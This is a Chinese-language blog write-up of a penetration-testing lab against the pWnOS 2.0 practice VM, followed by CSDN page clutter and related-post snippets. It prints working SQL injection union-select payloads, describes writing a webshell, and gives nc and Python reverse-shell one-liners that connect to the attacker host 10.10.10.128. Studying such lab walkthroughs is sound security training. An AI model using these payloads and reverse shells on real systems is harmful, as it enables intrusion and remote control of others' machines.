【学渗透靶机 ——pWnOS: 2.0】

已于 2023-06-21 13:58:27 修改
阅读量254 收藏
点赞数
分类专栏: web渗透 靶机学习 文章标签: sql web安全
于 2023-04-12 00:23:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jieli0901227/article/details/130095512
版权

学渗透靶机 ——pWnOS: 2.0

环境

攻击机:kali
靶机:pWnOS: 2.0
此靶机比较特殊,vmware靶机。靶机IP固定10.10.10.100,需要配置虚拟机NAT的IP,如下图所示,
在这里插入图片描述
攻击机KALI IP为10.10.10.128
在这里插入图片描述

信息收集

主机信息收集:

已知靶机IP为10.10.10.100,所以我们直接扫描靶机开放端口 ,扫描结果如下图:

 nmap --min-rate 10000 -p- 10.10.10.100

在这里插入图片描述
主机开放了22 、80 端口 ,扫描这两个端口详细信息,扫描结果如下图

sudo nmap -sT -sV -O -p22,80 10.10.10.100

在这里插入图片描述

web信息收集

访问80

在这里插入图片描述

发现有登录和注册界面跳转,尝试访问看看
登录:
在这里插入图片描述
测试是否有sql 注入
使用burp 抓包测试:存在报错注入 ,如下图
在这里插入图片描述
通过尝试发现报错注入点在数字4 的位置
在这里插入图片描述
收集数据库相关信息:
利用数据库字段获取数据库的库、表、字段信息
查询当前数据库中有哪些表

' union select 1,2,3,group_concat(table_name,''),5,6,7,8  from  information_schema.tables where table_schema=database() -- -

在这里插入图片描述
查询users表中有哪些字段

' union select 1,2,3,COLUMN_NAME,5,6,7,8 from  information_schema.columns where TABLE_NAME="user" -- -

在这里插入图片描述
查询uses 中的账号密码:
在这里插入图片描述
密码为:c2c4b4e51d9e23c02c15702c136c3e950ba9a4af
通过工具对字符串进行判断:
在这里插入图片描述
破解出密码如下:
在这里插入图片描述

使用这个密码尝试ssh 登录 失败

收集数据库信息获取到当前用户为root ,权限比较高,
在这里插入图片描述

可以尝试上传web shell ,上传web必须知道路径,通过端口信息收集到的80 端口是apache 的web 服务,默认情况的web 目录为/var/www 我们可以尝试先判断:
在这里插入图片描述
靶机的web目录是/var/www, 并且发现了一个配置文件,查看这个配置文件,在这里插入图片描述
发现数据库配置文件:读取该文件信息
在这里插入图片描述
发现又有个账号root \goodday 尝试ssh 登录 失败,
既然能够读取文件、那我们尝试写文件
在这里插入图片描述
出现报错信息,不用管,我们尝试访问这个webshell,访问成功如下图:
在这里插入图片描述

使用命令查看是否安装nc 或者python,发现nc、和python 环境都有
在这里插入图片描述
在这里插入图片描述

使用nc 反弹shell ,失败

nc -nv 10.10.10.128 443 -e /'bin/bash'

使用python 反弹shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.128",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

在这里插入图片描述
成功拿到webshell

权限提升

浏览文件发现一个数据库配置文件,读取文件有root 和密码,如下图:
在这里插入图片描述
使用该账号密码登录成功
在这里插入图片描述

懒惰的老鼠
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PWNOSv2.0:Desarrollo del CTF PWNOSv2.0
03-06
PWNOSv2.0 Desarrollo del CTF PWNOSv2.0 下载: : 1.配置。 IP地址为10.10.10.100的虚拟虚拟环境配置。 视在实体之间的差异而进行的配置。 2.埃斯卡诺-德波多斯 root@kali:~/PWNOS# nmap -n -P0 -p- -sC -sV -O -T5 -oA full 10.10.10.100 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-04 21:36 EST Nmap scan report for 10.10.10.100 Host is up (0.00033s
No.22-VulnHub-pWnOS: 2.0 (Pre-Release)-Walkthrough渗透
qq_34801745的博客
01-19 697
** VulnHub-pWnOS: 2.0 (Pre-Release)-Walkthrough ** 靶机地址:https://www.vulnhub.com/entry/pwnos-20-pre-release,34/ 靶机难度:中级(CTF) 靶机发布日期:2011年7月4日 靶机描述:pWnOS v2.0是一个Virutal机器映像,它托管一个服务器以进行实践渗透测试。它将测试您利用服务器的...
pWnOS2.0靶场渗透练习&udf提权&推荐练习靶场&较经典的web渗透靶场&红队靶场
最新发布
jockerboss的博客
03-12 912
pWnOS2.0靶场练习&udf提权&推荐练习靶场&较经典的web渗透靶场&小白必练
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用知识及工具 ssh、sqlmap、suid提权 信息收集并getshell 先看下web页面 感觉平平无奇,先使用dirb和dirmap目录分别进行扫描 dirb
pWnOS v2.0靶机渗透测试流程 儿童版
RemedyVI的博客
07-14 92
本次靶机较简单,通过sql注入上传webshell,获取反弹shell,最后通过敏感文件发现数据库用户名密码,通过ssh登录成功到root。其实/var/www目录下有一个假的敏感文件,账户root密码goodday,但是没办法登录。blog是一个simple php blog,可以通过访问blog目录的index.php查看源代码找到,版本号为0.4.0,也是有SQL注入和命令执行等许多漏洞。
记录一次pWnOS1.0打靶(vulnhub) webmin漏洞利用
chencyyan的博客
01-14 1004
萌新第一次写blog,各位大佬别喷。有错误和补充的地方希望各位大佬各位师傅指出​本博客内容借鉴Bossfrank和红队笔记大佬「红队笔记」靶机精讲:pWnOS1.0 - 在Perl CGI架构下构造反弹shell,你可以吗?红队打靶:pWnOS1.0打靶思路详解之webmin漏洞利用​[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传](https://img-home.csdnimg.cn/images/20230724024159.png?
红队打靶:pWnOS2.0打靶思路详解(vulnhub)
Bossfrank的博客
06-27 1039
本文详述了vulnhub靶机pWnOS2.0的打靶全过程。靶机难度不高,但渗透的思路清晰,环环相扣。本文打靶涉及SQL注入、searchsploit漏洞利用、不安全的文件上传、敏感信息搜索等等。
红队打靶:pWnOS1.0打靶思路详解之ssh私钥破解+shellshock漏洞提权
Bossfrank的博客
07-01 1098
本文详述了vulnhub靶机pWnOS1.0的详细打靶的第二种方法。打靶过程涉及到关于webmin任意文件泄露、ssh私钥碰撞、shellshock漏洞提权等。自己动手才发现问题很多,这个靶机的知识点还是很丰富。
靶场实战之pWnOS2.0
qq_55415442的博客
07-14 120
靶场实战之pWnOS2.0
vulnhub靶机pWnOS2.0
weixin_53665747的博客
06-13 142
偏简单,整体思路没有太难,利用过程也相对顺利。
vulhub渗透测试靶机习1
08-08
渗透测试靶机习0x01 lampiao靶机准备环境靶机下载地址https://download.vulnhub.com/lampiao/Lampiao.zip
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
OWASP靶机安全习、测试
05-24
在信息安全中OWASP TOP 10 是渗透测试人员都会涉及到的一个项目,意思是10项最严重的Web 应用程序安全风险列表,该列表总结并更新Web应用程序中最可能、最常见、最危险的十大漏洞。这里包括: A1—注入 A2—失效的...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vulnhub靶机pWnOs
weixin_53665747的博客
06-13 85
本次靶机整体难度算简单,但是对于webmin这个组件不熟悉,且对于网站运行权限不敏感导致导致最后没有做出来。今天回去以后习一下webmin这个组件,并补充一些linux运行权限的知识。
pWnOS v2.0
weixin_44770698的博客
12-07 262
靶机练习
实战pWnOS_v1.0靶机渗透提权思路整理
qq_39641273的博客
06-02 268
如果VMware询问您是否在第一次启动时复制或移动了此虚拟机,请单击已移动!否则,网络设置可能会被打乱。虚拟机当前设置为使用桥接网络,但您可能希望将其更改为NAT或仅主机...具体取决于您的首选项。
vulnhub靶机——raven: 2
09-03
Raven: 2是一台中级难度的boot2root虚拟机,目标是获取四个标志(flag)。Raven Security在多次遭受入侵后,采取了额外措施来加固他们的web服务器,以防止黑客入侵。你可以在Vulnhub上找到Raven: 2的ova文件,并使用VirtualBox打开。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [vulnhub靶机raven2](https://blog.csdn.net/weixin_52450702/article/details/127811079)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [vulnhub靶机——RAVEN: 2](https://blog.csdn.net/qq_44029310/article/details/126491848)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)](https://download.csdn.net/download/weixin_38717843/14052717)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值